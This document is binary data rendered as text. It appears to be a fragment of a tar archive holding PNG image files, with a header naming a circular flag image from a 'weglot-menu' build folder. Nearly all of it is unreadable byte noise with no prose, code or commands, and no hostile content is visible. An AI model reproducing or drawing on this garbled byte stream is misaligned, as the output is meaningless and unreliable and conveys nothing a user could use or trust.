$I��OB�����_5������۽��ۅ�j��X�2�)��!�
o`��tpC�_�ʸ�
.�a@*���a���ă��u���WΟ��W]����?Za}Tp�]�JfeI	{[ɻ��u�,nY'�
������Kq���ƗflL���
kO�u:�ɵ�RK���hlPbH���u����i��?�mj��ڛ��/J����ܷۻ�}��b��F���ܺ��ڸ(����h��I�n���n�+[*�u^�M��g�p:S�h�@5��Ō�f�0'��Y
f{/����'v3]�m�E��%�OV7���Dq��5��X|
t�ng��Qj�|�	���M�n�/�!jQT}=\��ݐ��ؙ"����Z#�tC	L3�����n`;Q@W
�
���R}!��L�������W��:�q��$� �
������
�����nhA�fW&�a�l�o�f�����\/�Q��醾�{��M�C7�`�:�C�Dݠ+=���w�L#��
(.:� 	i�p.�cG
)rs�O<aoo��g�n��ۻ����;�c�3���b5i�$��M�S�:��Iz�huQQt�I�����
,��DXB:0a]`	�p�%�f�� ��T�ѵ���xR����>���y�sg.����˝���3��y>��F�s��`�tt��	��5})B�'Ǫ߅����}�r�S<<{J����ޠD7�t�o�(�����Ԇmw���3���ġ܎��n������-8φ�����뚃�c���Cl��Jv�X�M��/�xu�R�-�p����f�n0�L�r'a����I��;�ï��o��������q���
:���C��AGM7ġ�0���9�Y�?�
��K��J�=K�
��K��)��=q�܉	x|�H5^�
R�*�
�b�+/�"���n��!�We_vmDz�e���So"ذZG���W0��@
n��7�6D�c�
��E9��#�>��pr�	�����PH��%�'�����K�7,Y�)t���F���Y��H�$���}�������F3ݐ�|fU5�6T�Vk��(gט_��i8��Df_�^�O7���xu�2�b7�fťF�4����X�
Fހ�W��/Oo�u��
�n@�
�h[���:�0276y|ܺ!�(�n8B�
�����|��[7P>��x�q���݉t�Awr��$�n�������+s�bb��
��ƹQTW}���G�W���o<G#o?�F
r|v¬�������jk�
�
���&J��5���)Ng��Fݰ=5=�R�ҡ5�o��uUU��U4ݰ�d/���l��G��C7��\�cp�n83Ll��ʂ3����g�}hn�'Йb6\"�+��0h������S8��v��v�e�0��M4�T�pz<=zN>�h�7�����G��D������r��^�nz��?~�ǿ~*H�މJ D7��)�]��>��g3�ՙ������Y��I��n`g7 ��ět�A�ݠ�}v�"��0,�醊
��*�
�;�o4�D����(�q�A7�b��4��qo��}齧���}�ey��**�P{@�
���
i��99IK����[.�����0 �m��[��tñ7��؛��N�9
D�䭮>~���+~�T����*5�f����s�F���
_���5�ߠ�����(�%8���G7���@�[��A=�D���1X���56�Rz���
dݰ?$7�ޏV�^hNq�6u�̺�̸�Ԙ¢n���xt�I�M���"JpQ7����E������~��췲�J�
�iyܺ�}*��t�&zZ��4�o�m���~4�D7L�M�����;Ųn(�&��nX���[��7�{z�Y|�ễ�g��ww�����6p]�)<wg��f��볿�=����CJ�
	bd7x�
<p�����aǬʊ�[�Cu����@*�n�vz[-po�np���!�
�/^H�
�ޠ�s��gfɣ�ʠ}r��nx�Q�_�<A7�=����=�t��`�
\����·_���W���D;u���Y�+�oڧ��7��i�sy����z�ҙB�� 7�
�o��y"n�sӂd���7H�xe����
hKq�~|��h?�ͫ�}�M�6���
rzC�רR�� �o�%@���@�
���Πo�����T��0>�J7�km��,��	�Y�t�G���L�0��ĝkG}D�
R�vt��+wv����L��n�Rt_�Џ"HtPtC��F7��aUW�sgu�
gvC
�mW��Pr���.��G�d�n0n3t����f�!�3��LѽY�
�/�ujvCs|3�#	T����y���3��t�����-7�mQn�*��W���86���ȯ��wd[�
���n����t����J�nľ��М͑��\�����(:o_��ޯ�a`�Rݐ��n��Y�P7D�E�a膮�npd��k7�ÉPh��JC�Ĺ�h)����s���g7�f�8u����c���q'�v���v%��^*B���,�I��0k�M����,��7��n�_.8�n���Yr4�n�Cr�$���Oz]QѼ�%�n�$�itÔ��M��S2�#���0N�
f�
�$�%uC������P�u�s���C�!^�!اr�W�'��݇�R�oQp�N�@�Rܠ�
9�Bc����uC��~��nسgVGM�5�i�dǰ�dRyv�N7\�E�5<�A�
��E7,S���r~F
̍fd?TBt�����ֳϋ�O{tC�K�vl�[7�����^1�]Ă����L7����w��a����)i�A�#��B�%�.��bI7��"���34�Νl� �*P
�͛u����nV��ʧ5/�̎/��?/1���
�醞bªO�
u��7ht�˵��dw�+�;�е�� �A7����ܝ)�7���� �ni�A���R�ܺAnh��m�
A��L7�DUV�FE�V�}),w�h1v�@	�G����٪X0pSt1�������(�����O.b��;�0M?`d�x�K�	X�2ꆩ�n���!��
(���f7h�|q���Lr١����j��n=�R�H7�s��3Z��(��ww�/֬J�#�n��O݀FA���:�{ʛ���|M7�!��u�ؚB}O�)�t���bꆠ�🄇�tû1@G	a�t�SjW��|ĺ!It�[S̟o�nh�<�L7$/w�u�Ӿ�'���i���e7`�A�j|�p�D}pp=�(�醍q�7��H7;ScK�n�����O��=L7��˯�s�e׻teU7����������i���/�9��1:z�S>��v�T6��P�^�%%^��:>�
�9as�2�U���m@/s�!���{Ҥ�h-�r|���/̲��Q�����
f禐߿�
��}��,��v�`�c؁/�A���іߠ�
��o���l�L$"� ԉ�8L7�C�{��O�nؖ�Zk�m�`(��ˣF,a���
-�@49$�����M�a�~�}�vt��v�RS��X�
���Fwh(Q7��>��]h��ox�H,�W?:ں.��~A7�4
�)zC��� 4����v�����nP��F��)
�+�y��m�
�gO���K�f7d���yn0�y�~A7�e�w���x�]7���
�h�ͺar�d�\�'۫~I����+�%ܤ~u١b���q�\�8s���~fI���u��� �,�A,5�A���΄���#v`7Ⱥ������醗^�Pmi�ޕ-���Ւ����W��u�����)�W�Z���A����t���L7�u�0�6xd�
�v�J��>�!q�ڵk�!,V��5�H��n�bK�g��n`���>�AhJ�݇��Q.JV������"f9��%�2Gd	���Fo�%ep:��� ^xtlo���A,��a�kU�*��К"���"놠���5��:�z�R��S�z��
�����XJEr=Z�'W��8��h�
F�@H^V���
�nq���@1���Nݰt߅��(�pA�h��ХK�F�np4�
j{WStY����%1��Ε�#�p���o�Y7���(���Ԫ���^zx�,!!�T-C�ͬ��R[��n�M���c�d�Ə�u;>R|�]��Q���3�yEE�����2��a�"8�3�96X�
��0�nXm��v$7H����P�u�&f���YHN>��hw�G�f�_b3���Cp�N7�_��/��
��=��e�Q7��r�V�����u� � g7 ��nX(g7H��u��I�ᦈ2��k���}?m�
�@^��Jp��3��8t=����	����{{��G����q��1n�V��aٳUU������2R
Т�x5֙bѓ~���Ñ��
v���ReI%̼{z,�=o��W^�^_P?��n��hrC�� 놰K�,膠�'��K݄�oܿ5��[��#�n� [^�
���\7�,�*�r�4jAL���
�`��թȫ�	(��1����5
�Mۊ�ܺ�u���
���!JGۨ�uSץnݷ���cA7Pq�]����(���>���L����#�9�>!�!=L�9�oQ�,�
��DŽ!�
��Q7�NM�M�
&��ފ�Zt�{c�-*��)t�a9A7H��4{g�h��D����np
�hk�����A�V��99�m�
���8���v�f7H�AzM�
x+
)�A��O���hNq��������莨��tC���P�(\7��\�rh[���`3J	n�"��u�uG����~S%��?���Ch���U�0��ro��ݐ��@�w@`ɣ��lͧ+S�o�[7��N�P��t�������[�n��F�n��:E7�q�e��.�����m8�)�g���{�Z�
p
S�Si��=Z٣�~K��f����#u]���ԍ"Q�� o_ȶ�[7|���<�a�X􍵬7t�B�N7̗�Bi��膤Ѕ�WL7i�5��*�����+quC�g�k'O������kE7��n����#-���[�?��
����1Ж]P1ƨ��Ip��Ȩ�5"t7i�ݺ���J��K���̲'�A�
w1V�K̫����Mp�.��ǿ�ZQ���
Rg�]���ѯ4����I^ju����%�~3�o�0N����k��s�p���#G7<�u�	��$ݐ121P\,g� �̠f7`W��}��� 6|�=�_?�n{�Q�PS
�%�܏]6J7I3x#�Ja�{Υ�Sn�nHP��P��OJ:jZZ�J��
��;Wj�
H7L���iߟ:�T7 �o�4�W؇9W��t�k�xt��*ڭ�FpA7�K�!��`�Sq��
��ݰ�[7,]�V��0W,��
A

#.�A�?[[�����B��{�9�΁�H74\N�ރ����[7пVt���,bi�|,ꆂݻ��ǞH�n����۶�����Ϥn��ၧ�n��)U7d�w�J�$�C�AX˺!�;���f��k�%%7��
ݡå��콰w��������&խ_��fn������|�t� ����M��
X=�e���W,������n��ɼ�<R|8D7 �О/0u��}?m�
�~�Zp�-���@�
A�a���-6��%�lXP�Ân���*;tC�� ��fY7�1��,�u���P�Fp�p|a6;j>��֣u��7�t���/�n����_X�
��Wӕ��coL�uC���Yv�)�!H�
j|�F7��rg_g
�Ҭ���ף�u�`�'���X7�<c@4��T�Tԑ��K��_7|<s��ꆎ��l(�ﯘ��a����	��R�g��o�^i�n�%�1�a�A7~;��e]��X2p�����Z_^��z�ܥ�u�$�;0it�������ʒ��
�D��G�n�t�IvއB�
ytC��
�6膍qq��G�Y�
�X�c>��-Mu�GWؠF��q�W�ՖtC���-��*2I�M>�u����ʜȫ9<G/ڭ�i	���_�d=�|'��e7�
�ϕ�`�nȶ�`4�==�6�}H�z嘽�?d�tQt���9R�
8���_��8����A�M̰��E� ������0.D���
T�`�R��]�O��
��7H�AjR!n_h��S7��e��z�����g�+R
�h�r膹�ho+�p
Uu�6X�
�̒k��?�E�
(��^{t�+��•��
m�
���p�����3��L���.���U7�M�ݺ��h2mx<t7�� �lb�A���
��Rx�>�4�
�?�!�AG�
��N/t�JH /u��;H�
��L� :��q�_����axn�.�[7�S��t�ACi^@�a��n��.$<� k7O&��o��@|�CX��	���n��f7@S
ԒB�G��Y@��audNii�����a;�n'.�yGC�p�SKCC������Jv��
R���0u��xuC�܈r�tCkv�l|�>���5���`�7�)zvC;:�M؎���m��nX��9�G7�O����˺n�+��;J�n(��s��e�ݠ�~�b���&X�
��?n�1����uC��T0�_��^���M�<!��B_
�n't�xO(�
�nur�w������d��u�@u�`�իW����&��%5�ܠ�
w����u���T��+P
��u�
rv�x�nXh�n��ƛ�P2`�]�	��a�
��[t#���|�=�=�|�A�:��i��O���*[t��f�n� ��'�
I����� 醗�W>��H�zm����ݐ�|iw��a�ĉ�!>�0�r3�
Jp����n0����`����f��N�_dv|>��a�/՗���'=}0��>xTūN�Zݐp�Sj���	E�4����
۵cfد0g�"p0�;�Gg
,�a�t�����u�X7\�u%��npf�ݙ�a�
�+��a�����a�nxj�8�'7�A�o@���\���~��ϧF7��-)��esݐᢗ�!�{��M*,��
UƵn��5ݠ��)f7�
2m�,8���n07��
v��)�A�+�K����e�� Nݰ��ݰ�3�AoX�gv�����a?�����1:�@�]b7��@n�I7�
(���Bs�ijv�6p醄V��y�����������ޠ�b>���/ңD�@�
Vuq��O��;�!<|eKax��RVY�
��,nݐ2�I�7Iy2�A�g�S7.�цd7أb���X,�!�����'6��d7���?�܀�7��� u�8�M �!.<�Љ����C��T��4�AO���Йb5��9>�oSv�@7,F�am���	�
)���uޔ�n���
X�C�|��z$�!���n�����(<�e7�.�I(���At��Hq
�R�(e%�ZSD-��3���Xe)�����~�40�v��N_YNYYnI7�����n���׷����
ۘ�)�u������"����3��0�u/�O^G�KݰC�|,���q�:��m:S$�OrZ�
���/�Q7L7f7Ѓt�!����:)�����
OS���0-���s�u)�Aי�TVu�R���Ԁt�&�A�
X|ک��L�h��
-)��
�s�u!��M��A70�ȺaIs�m��܆���b�է��a��U6�c!ݰ�}������
rv�7<��-o�G7���"��0��-��nHv�ܠ�
R|��n4�!�2�
 7��>��u�퓩n8=shuCK��,�`�-M)�(�Z�n�Ό'�X{G��)�D7�12� Vg�!�
��|yy���
����/\��v��9�
Xp�F7��
(n��=?����Q�MJp0�n�6�����F{##�7X�LQEC����܀���
��<�ad膍�q��&�Q�G�ݰ>���h��g���'��I�nn�����p�9�!�t�A7H�
���Ӥ��4zò
<���GS�T7�l�=�AnI!��g�W8t�wRr��B��um�;�
� ��
j=n�a�Gä֋�
.�D�
�~��i�����Gv�
�
��4�!V�`��
�o�u��&]��#V�n(�w�p8�
�n09�0���,s�p�-'�n@s,������a�vm�@Z
�G��3Q7�Z���Q����*�a�(cg
6L�� �.�}!,��
#�3��Pv�p���E��`�nP��T7l�A��@����nxz�t��
��W7�zT�!^�|��`ώۑ�@	n ���?�nX����I�a�6�A�h����#݀��綢���
��3�t�C�nء5
�qp8|�L7@|Cມ`9{��n`g7�!��ܠ�>$�����N�m8O�
C���F7�;>�nx,t�oj��An�9݀�7�$����ݻX����
���t-���B��i�4�+�2�
�D����E�,����uûI��_�珉n 7ؕ�`�n�y�=�!�9�َ���!+�)��<�A	n��1����
�+��n��n�9�������>l��n���Q�/����$
[�IEND�B`�weglot-menu/build/images/circular_flag.2a0fa173.png000064400000244137151330373270016020 0ustar00�PNG


IHDR-�0=�G��PLTEGpL�>6s���/�����_0���5���=7�0��+�f2�d�S@�?7����������L;���u*����N;2J��:I�������4��*H����1����+��D�_���)������B3J������D@�,5tƗite0�]�C:�A<�uy���fd��bQ;N�0���/>��+��-�f�0��&�`��I�9.�-<��,�fK( &##���5�r!""�M+�1)+(%MJ]����rk똘^����,I���)�ei�M�Zff�מ�b�nm|�������D��3)�h^���v-,�y�
0/("""բ'fW���M�����D����)���-<�L<��'�`�9+4��+H�!!!.�qG�QK�������F9u���!�:F�F8�*f�5l��|�l�-7���,h��<�}^������j$���<�0�n��N�#��aj�����ХY�d���A@r<==l��;������ݾ�14/#����֕�I�QU_ga��ŔЫ�ȈwM�������w�?��f������Lƹ3��덟ƌ��Je�u,��Y��֗��e�̝���xvv�x�b[��`�~mƓL�4q9ZU#=W��6Բ�w]A��}i�t(ڕ��[3ЦP�M@��>���~��Z&S���v��D�&��+�����ݰg0���`�OG�x�KYS �e����DhZ�d�:��-F7yntRNS/�6�:�Q9Q�d0�<�6��P6����d��/Q�3��R���T�É��[���d�����WŇ�6e���Y]�a��òƄ���Ľ��������ي��¡���Gۄ�D�IDATx��{wUE��m;$

1H�HH�DDi���
Qa�}����\!I0���ى�<�\v.�I:	�͍{.H �4i�1�Gxkݫ֪�Us_��)��S.j͚5k֬ߚ�G�Cy(�<���P�Cy(�<���P�Cy(�<���P�Cy(�<���PJ`e₧�p8�8�xz�ć�x(�<���P�Cy(嗓1S6.~�[E��<d�M���˶}��q:+>��GsC�鏭��IOH2���&N�T�Q��lY�6r��M���9sѢ�cG�6u����	��7a����ۏ�dŊ%K�	�_�iә��
_?h.�τ�A0��*x��Y��
�OHPPXXPP�h��Ѳ�^?t�xP{/��D���'>�d��@]�����!a�9���	�/h{�x����䯄�9&d�,��1RRgd������k� Y��


�5�1F�?kA�4o�<�����2e��)��7�~��9r�:�C�ܲnݺ���O��Y��5ccϡA�`�x|g���O贅B�	�?x}�Cd���	_���X�|�>qժV=;�_$>_����O��=h$�p~��[��_����u���)x>B��xl��fi?�@�׻���k�ɲ&P�̴i3� ��wX�2e���/�"?��m�$�4^(�#�/��.�υ�}w��i���@���+����wP���/t=����H���o��Y�|�l�`��m�~t�wI�����A�-��'4��z7f��%o��D8��.��	ؿ)����U��^�ڇ�^�%�p��/ ޟ:�ޏ<��8���/4�����"��d������_�(��g̚��7�yߚ�?�{�O�9sld������@�·@�7���|�t^��l��Uⱀ�U��O_0�I����~�F�c%�@�狠�P?AS��mjИ
��{�ח�y,>�y%4>�5~| ��.�H���g�&?۟J���Ň��'���π�T�:���?@>|�`�X�!o�{ɼ7D�"�z�>/�b�ˇ@�G��(Ae�>�Ͽ�yk�♐��ߒ��;h!�?��9�w�C�Kz|��'-x�nћ�Lo��4<�kIFm����i�����E��ڇ�4Q�G�ٵG�z�.�V۶���d]^X1ˮ����� ����hE?��~F۵�?�O�.���˶?���$%U���b�N]��go/'�"��H|K;iA���'��d���ɛ�����v�罸a�=��a����~T��?��j�.Oُ/��c�x�>B��:^&���艜$]o�b����^d~��Nd~���eߟt�g��k�o���;S�P�,�?�>�/��;<4��.�/���A���qeQ���Ra�#]�P�M�H{��������ϼ/��"�>Fn�K�xf�KY�#_�_P�@�_�Q�,|�C6��x��?��,��ui��
�|���L��"ן��P�_�`�K���u�X�aׇƷP���l]�7��4��T�����]���SN��O|>�'�ū��'����7]Q����e���t��GP}N{w�]f�;���P�|YA���oO�a�.���~�����xA�!t����E�~�z�OA����`��̃g���~4��4����GD��G����g�O�\���B�nI2$�Hd��ǁ�a�(�녂�w�^B�}ӏ7��@Ɵ�z�C����N�a����Q��������Y��T�Pm�����zN�.B�q����}�������+����
���G۾�e�G~_/����/K0�D�䗎'��'����;�~��_E8/|���ߟB�kh��j���1c۵O_����/��/|qH���z�|���Q�䮈����^��>����cP�0h�xc�'E�����>B�3��Ÿߖ�X��ԏ����E.�|�i�؏o�R�|�Tl9B~����E�1��w(��>mܯ@	zh|���|��~'vN� �(���#��g�o����.�)o�3���l[m��U�<�+�LZe�^o�L��C�C�0�����
t�
]���$4��`����C�h^譏W��ʏ�[���w�>��>����3���3l/��ʟ:��߅,��"��HvМ�?7ܟ����U8�����U�;tT/�~�g.�Z�Qk9��	�^�'��e�x��	Dx+����SL��۞L))#^�M����m¯��9[ՋpK64ӟ�����*�=O�?�Ms�[%U��`��q�?��"�_��IҞ���Fo�7��[XvC�q��k�����9f��36^C����E�3��g�U4i��o��A��5a2�X���G�/�Tq�&�1"~aуC,����O&ٷ֟�d)̿��-=Y�ܶ����o�&)���{\��ޠ����Ri]�n[��\_����Nv�y�xA�Ä�`�����4R��Y���*ý�}�_�_3�E�����ڿa?b�yq�f7��g��q�������|y6_��JY��J<�&��;�?��;�R�Mh��>4��ϐ�9�&��k���4�W��Cl������*���O�(��|u��}._l�O/�œ6��|��P�_�N�*��������T������A�ݒ�ϓ���?\�O}.IJ?jh����k��*�Ů�_�x{�⾾��׳d�~�1���G:�h��%��W6���@�ky�����B�;��^_�p���y!
8a�2�:�m?����@��3����w���O[�
pK���G�h�g|�[��~
��}�Z���?�._����w�|7n�3����%���@�	�W���x�o��mE�u?�����c�k��??�g}.��j��Vn������}y��㫐�7����/O������?ӟV�g��F�<�O��,^�/���E��ڧ��~$��kb�CQ{P�m
ඟ_·@۫�p�c�o>�ܿt<���D���/����˂1~�?��#�>C_m1�o˫�\��O��p�8_dY�޷��4	�<(�v^>/��s�z
����f?h�m&�ڭ��o?&�o^���U1��n�(��.��u�}�s?�^�QP{��*��pO���/�<=����V�l~<l]/���J+!�$���<���u�=y�?�kk<�t�?�?�x^�g���;/ķ������ʏ��^�=؞��T�3�)W���=���Cx컀*�X�(0��<����-C6R��1��v�pg+U���lu�x�YV�6U:{U���.�ֲ��C�k��-3ᒇl*�Va_��d�,eV-~�_�$^c��
������3��y�4a#�c-�;�?c���7����4���\����_ҏ����wTaڛ5���8X�c��K���?Ԟ��5��[�/�9�3��}���'�&��C�������L��Q���)U���>�!�x�ߊoK�Z�/Կ�=�t�n���ݿ�p��w��^%���9���?�E��p�v}�浟���g�y����w��D�lFb��F����]49´��l�_�_��4ܼ���?n?B�2�&�7��p�/p�s�����
*�{�?2��;�}
t}�|��g����WZ�q���o�7o�_D�/�)Ͷ�V�\��ysÕF��a�C����4a��M��+�j��}.'�"�,l�:�o�$�
|��y��_o�� ��d���;�f�{Ϟ��ҧ5�����eoםP�o%�Bׇ�o#|��r!��^l?_���ƈُ��Ϣ��1^��ߖ�m?�L��w������_A�S�����?x��F��Z���n�|��[��g8����]��RR@�1�2�_�)�� �p$�ps���f�۟��6_���@�w�|'n�|�:��i�����G>�w�矡���+h{h�
�߹|[�'~;����~�~���|�OU����I��]2��>��"����_�77���||���H�ʊ_*��7�_�~��G':1������c��/:����E���+��T�z}<+b��·@�o�z!���^�$��K�cS�a*�ߚn���'9���D�ğ�|>�>߯��o�<�4�\�@���(��>W?_R���.���Gޜ�A�;������~��y��{�o�7��O;J�n^��.��(��֟�8�'�h�?
h��c:��n�=/�М�gs�Xplɞ��x�à����|4E��@�m�z
��B�!8~�Ɵ�v�h�����OVb�^�����_�	}�9�4(`���g`� ԝ�����E��'����wS��)�P^|�� �U�;[�d��t��N�QZ��F�d��3�}��(�C�!I�g�SR�E�C�Kd�s!��ӄ~}���C��G6���?�]Y���E�Oſ����ɐ�X�a�?�=
�f�ߺ�![�.�!�q��
p3�����8���?�2�k��P����������=3���,�\;CX�k?�i��?4)��������K�E�Y�7�O��d�?@�?�O��7�O*���?�0~{����P����s����X?@���'�f��WL����!��Qn�x�����J*
D���v)w�����=����B`�R��
p3�'�I���Ϛ�f����+o��ල_��"��
d�
W���t�\:ߡ����+��$@��7���/ŐE�A����V�;�>����7gn�2|Qt�����|�g������~�\�W�����a��U�ē`�_��N����_���
 ��2�_���[nTE�/�$������P�ô	2�ݑ_Y�+p}����vȇ}E׳,r���v�Ġ���+�m��I�x�9"��!��i�ˋ������ܘ&$�My����_�S��&������Oc}��z��>�7�?�$�͞�����@����I��(�sbH����?�2���
���3�~��(���?���nf��
�W�
:_����3��+���A�`{p�
>��`��;��<p������R�h���%??�G}�ן,~�۾bȶ����f�����
������s�_"ɾ~��������:B�ۨ
�_����:R�����'`�;z=k��h�/���^��NJ̯��C���Sn~|h���o��x,�G���sk��o<�pr��?�OX>j���Y��2�m�V��實]H勨��>�g��![��R�z
?/��w��#x��w�A3��\/��w��
p�k@�PnV��.��(���+��ɬ��T�����p��K�D�z�ϳ�,��!���=4^�0�V
�O��*�-���������Cp�;/�W~�_�	4/�����*�k�q���'��iX�`�p>�س�~�p�����9?_��|/l7�;�X �%�4z;�s��&��YV���m�~�ڣ-'rP���;�&$��S���Q69�)�)Ek��0�v�q�|�����#�)��;�U�����h��G�[�rDu��{��29D�Kh����nz�wr����Bӿ��M�o~QڿA>�N<\���k��K�wZ�zh�a���_���Lyj���{��9E?��X7��o�2�6^`�l/����џr�6�~�G��n���[h�:�P�&�pS����Y7�?zy�8��S?P{���%�������শ��c��������J��>ܶ����6R�)�����=�f$�n��/
��/�M�c����=GE�n���/�
ඹ_����7��ڶ#�~�[�N�.��I�������+��f�����7����o��]s�(7m|_�l�|-�qsO�X֑�C�����g�ii�r�����g�;IL�>1��xu��I��Oy'�p�%>��i"u����y�N�>
��3�w}NS�E�����n{K�\Ge��W�P�C��)}}���r���f�HY�˸�Le��p�g��e�ߎ�ݙ��)4�Y��{p�6�W�:�z���त���=I�I�{����W���Ч����I�e��V�[E�M�Z�_3�M��@���	^�π���&ĶB�>����7Ӟ�_��C�( �'��Ә�#�Y�x�p���n�䯠�%t)��F�!�O���!a}B��=4���wP�~���`�?��}�������+$�m?����>��O��Ͼb�ga���M�x5�@���d�,���Oօ�Я�S@�W��
�����E�|_��Y�u�{���aϯUN���l�h'��W@���\���W��!�[�.�Ƈ4����N:����cȟ�n����[��x�Y.��d���'0��ϙ�CU����W�p��;zK!�"�}���ϗa�_D���^��y��^��������7�@�s/�-
�f�׀�a��`�]"�Ѻ:v���,ђU�����m����a;ÜU�o��)��C�C�U0��o���LP�H�w���
]���Y�?�����#�R�w��H?����29��J�Q�*��.;`�;�n�|G��%��&Jֈ=�45�Q�����=+��/��D�3Q�����)_�w�|/l��ld5�~ş�|NF�3�
��߲??��?�2"���L�<���� �g6�_[v���{��))45�+SY�g���9颟����ݯ�$,e��\�L��ҟ�j�m��|4�dJ��er������gܴ��䊥�s�2��*�M�7�o�O��Ȳ"m�N��7�	i�=�ǫs����Ε����y�:���J��[��h{e�7e����+��G�����k�ĕ���/Կ�d��g��,7�?��K��n�~����?�U'�O�����~j঍�?̕]�<Iw���l������Z����b��X��v���
pS�j�f���Xi`����v���
p���
p�a�H���޶�v�2��i3�~�B�;�?C�4��oh(��6~�����*�9'�Bp[3"�9�y��;7�4
�'Δ?��/`�|�������gypG��6^��'���_c}�����l���O)�]����w����=�}��B-�SFM-���ݡ$�z/�ׇ���GZ��U�ʼn���e�$��Ϣύ8�}��u��1�Y���6�Yd}Y���o��[��{����_3��Wkk�^���8�z7�ܔ���]�
��b���~X�ǧq�2c������F�k9��rb��5>��?�o�g��_R�焚j2�N�c�ڧ6?��Ͳg�����/
D�	��\�y�O@o&��*�������Η�d6���C��i��tuv�ꯠ��6~�y������b��8����~�~A��@�c�
�/E��`��$W�^�OM�ܯ�2�u�B�i�=��#��_���>�O�K�KJ]�����wN-^�v�+�����s�Jp��?݂�� �Q(��"���k1�3LbYO_����g�+�׏5]�v~�%����oo��7C��-����$��i��N�M��q}�����VV��P�\�J;
��}�}Rn����E��|�>�g��K�0�/J��S/�˼�GrN��?x��ܴ�\`|���P?,����<�K`=��'��$6�p��3�{�^�=/�{����W����yu|+�g~�׿��+��5t?�����+?��m���,���C�x����B�`�cOuju�/}��N�ۃ�	��
�>�����9��<���%R�iω��g�=������x��E��'���w�����F��Dpgk��
��G礟������K&,τ�4�	�I��3�n3���/�6߱�xYF�F���/���[,�r�6WYZY����X��6	pkE�ǂ�/K�m�m�mcϖ�h�s�mn�d�N�m3-����-����?��y7��8�;�!�ۻ,��Ⱡ�<������`sD������]¬�������:�mio�����@۫�	p����O?E�6�KD�
�m!����o�>������$�5I$����A�~����?�M��f�I\�p��k�6ඌ�?H����Qo�yr���m�m>Q4��'O�	n�߶�;Y������9��[��f|��Bw<�6���^��ͻ_WB�,!F�/C��I߸a�Q��<z�m�w��~��sn��Y��;�?C�4�"�oh,��:~�qW�=��� �_�R?�ys�ƋwE�'�JKK=t��l?`�|���&�/�����"Y�{��K����oG�Gb!���o���{m��<�����z�_�p�	\�>�|Q/������Up(�V&�a���cOj���;����H,�F��u4�YdA�3n�X_��ڿcõ��4~�B������#��݇�6�Uk�C%��ѯ��A�z�W��'����IKp��f��o[	n��1��h�Y����@�����-�*o���6I�o����?��Ͱg&��~|� �T����e=Z��d>��L�O1nn��L]bssb�A(2_�����2�v����-��/���Q����7h�-߯�m�5
��/��9]L~�+���y��d]�(���_�j��`�m�maʊ�����?I�������[����-�=��#3�_ag�+�Ģ�� 1�-N�`���04�;���z�������'�������~��m�_[H�wح���Dp��������|l�q�Sn��K���c��f~{�h|��)�jA?�dܾ�c��!ඬ/;��e����j��|�ap�z��|>�>��:�⏳	�E{f�f%���E,�|���/�܊��	��^����;��H�ϑ���4�������p'���~���?q�'�_����O�J緓���3%�,��Lp/��@<��Ȇ��ƫ�V��R�~4~�pß���^/����Ʒm��l9
�s����s!�F�M�oz����x*�F�M�7��W緥p��?�|Rju�xZ]M'���;�n��?T�y~��`�`��a��~�c��ɥ�38?�����Ƌ�/66���!x'��߱��1~;���o������?��hɟ������*�}N��8���_����x�-;�I���G�"��N�-��ĉDX���B��+,�V�*�A)�B\ڎ<��
�U��,�k��?q].�p��G��[�փK����d[!��i+A��e4�=�&��f}aGp��O��0�~X7��0Z�m�&ڿa*����7�1�m�2���_���?�|����#Q�S�w:���z��t��2ڗ���F�:�$T��X����v�7|�?��|��Gi�wa�
;���_��q��?�O���B���O�M��y��¿_�>F;�o��j�Fj*��T�8�n�CD?P��`p'���O��ayv�i���A���R���+]u��6�&��i��]Xh�$��ߩc�;����E��s��旃	p��!�9�෇��?,��~�*�-��Ηn#.9~\����2_���=�vg��wm��M����������p@^i���������;�7џ�w�d!��bf������:��W�����M�'T?_��8�~픽~�؝'O�1^%����o�oG"ܣA�&���np��x���?@L�����;�,�{�_�9M%C{�v������?�8ϗ���U-'�.�X�o
�<��K�Ct����m��b9�n4��z�I��a�	a��/�xݿ�`�}:�m"V�챕)�~�xEF���3r�g�c�w���6R"�Y��_����s=%�I�}\�ǥ�
1c���v <��P�_����*k}�ϡ�t>�{�)6^`��>e��!tI���i;�n�`�t{f�>�Ƿ|�1�����}�\��P��M��g\���L�O�nV���\7�c[||[��.��;~�Lp{�O�N�Ay�`p:�5�G!�
�ߠ�r�M��gw���o{�Μu>���t����yfd��~�~��g�=,ܾ���8;~�t�̌��d��?I������_}E^����6#�/���%>�T�ܦ��*�Jp���9^�z�+���1�p�����.d��N�Z{�C�/��^� ә�y��v��Dp����;_^_�ǖ�Ɵ*�?u�p'��3��RR�A��������!��?)��U�ۤ�i;le�O��D;�;��oY7��ǫM��O��N�D��!��8	�|��C�s�tt�l-gcO7f���,��tޑ/��}��S��m�Ͽ��EN��z��yp�Y���4���4~�a?H�M��C�c�'�N��pn�?�r�n�߮���:�%8���\F�wT<�hh`�{���� �3[	�=4^Ƿ9v7i?F��<o�I��WB�kdo�A��H?����6H��>����9�6ZK���KS��E��Qx�M��Iʃ��q~T�_�z>�|O�ʞ$T����D �|��^�2`{���|��8:�P��K���)���:��$-�����o��t�����So��G�#�H�"��|��	��o����)?�
6�A�#$��<LE���Fn���9�}�+�e���?����Q&M�x�ngD��x��'$�ܻ�s�{�{��
�l?`�C��g
~��;�wU�џ~JN^ʽ_�A��]?r���U�����&K�EE�:EV����'t�}��H�����?��n����{��k�\��~�7ao8�����7���W;xL�G���k߱�I�3Z����]�����_�f�iȋ־����Y>\�)�
�S�޷�@<���LD�ԕ&0n��4�;/������71��w��ܟb�2m.����������a|��M�'��O�~{����!�:��6��B�&��q�T�
��܈�:���3�m����ܯ��?�&�U�=������?G>�72���%��ixL���BSn�~��B��_�7��J�_&��߯��9 n���:��q��AvV�孢�(
���z�?z���R�?AXӷ�6%79_${:��ҭ��C�H�����-ʛ9g��*��Fwq���7��?��g����WJ�����%�X��}���jȜO���ag
�&�.��O�t��p��?''���֟H��6�&�O�~��/�b�}߿�����w�l��U;�{��z��oG"܄��=~4�;�7i���������?y^h�[jpDŽx�Oy�cG���9����k�����;������ە�./	N�)����xک�է[?E��?=RȎ�C�mDp/��Ẕ���KpR�o7]g��~-ćx{�T�{�s�����	��l!1�7n?��U��4#��R��Npqֻܘ�\��&�ܓ����>��i�ǟU���<�
�_'�Ѣ��*�p����n_�s���O����_���&�l?>��6�M�g�m���!��w�|
